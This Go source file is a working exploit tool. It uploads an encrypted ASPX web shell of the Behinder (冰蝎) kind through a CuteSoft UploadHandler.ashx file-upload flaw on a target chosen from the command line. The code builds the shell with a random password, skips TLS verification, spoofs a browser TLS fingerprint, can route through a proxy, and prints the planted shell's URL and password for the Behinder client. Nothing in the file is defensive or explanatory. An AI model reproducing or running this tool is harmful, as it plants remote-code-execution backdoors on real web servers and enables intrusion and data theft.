package main

import (
	"crypto/md5"
	"crypto/tls"
	"encoding/hex"
	"fmt"
	"github.com/hpifu/go-kit/hflag"
	"github.com/imroc/req/v3"
	"github.com/liushuochen/gotable"
	"github.com/thanhpk/randstr"
	"net/http"
	"strings"
	"time"
)

func reqClient(proxyUrl string) *req.Client {
	c := req.C()
	c.TLSClientConfig = &tls.Config{InsecureSkipVerify: true,
		MinVersion: tls.VersionTLS10,
		MaxVersion: tls.VersionTLS13}
	c.SetRedirectPolicy(req.NoRedirectPolicy())
	c.SetTLSFingerprintSafari()
	c.SetTimeout(time.Second * 15)
	c.SetAutoDecodeAllContentType()
	if proxyUrl != "" {
		c.SetProxyURL(proxyUrl)
	}
	return c
}
func generateRandInfo() (name, pass string) {
	shellPass := randstr.Hex(12)
	shellName := randstr.Hex(6) + ".aspx"
	return shellName, shellPass
}
func getParams() (host, proxyAddress string) {
	hflag.AddFlag("target", "设定目标地址", hflag.Required(), hflag.Shorthand("t"))
	hflag.AddFlag("proxy", "代理地址", hflag.Shorthand("p"))
	if err := hflag.Parse(); err != nil {
		fmt.Println(hflag.Usage())
		return "", ""
	}
	return hflag.GetString("target"), hflag.GetString("proxy")
}
func uploader(target, proxy string) {
	name, pass := generateRandInfo()
	sum := md5.Sum([]byte(pass))
	md5Hashed := hex.EncodeToString(sum[:])
	md5Hashed = md5Hashed[0:16]
	shellStr := "<%@ Page Language=\"C#\" %><%@Import Namespace=\"System.Reflection\"%><%Session.Add(\"k\",\"" + md5Hashed + "\"); byte[] k = Encoding.Default.GetBytes(Session[0] + \"\"),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"U\").Equals(this);%>\n"
	vulnURL := strings.Replace(target+"/CuteSoft_Client/UploadHandler.ashx", "//Cute", "/Cite", 1)
	client := reqClient(proxy)
	post, err := client.R().SetFormData(map[string]string{
		"folder": "/upload/",
		"Upload": "Submit Query"}).EnableForceMultipart().SetFileBytes("Filedata", name, []byte(shellStr)).Post(vulnURL)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer func() {
		_ = post.Body.Close()
	}()
	shellURL := strings.Replace(post.String(), "1,", "", 1)
	shellURL = strings.Replace(target+"/upload/"+shellURL, "//upload", "/upload", 1)
	if post.StatusCode != http.StatusOK {
		fmt.Println("[x] Shell Upload Failed ~")
		return
	} else {
		t, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
		_ = t.AddRow([]string{
			"冰蝎/Bebinder", shellURL, pass,
		})
		fmt.Println(t)
	}
}
func main() {
	host, address := getParams()
	uploader(host, address)
}
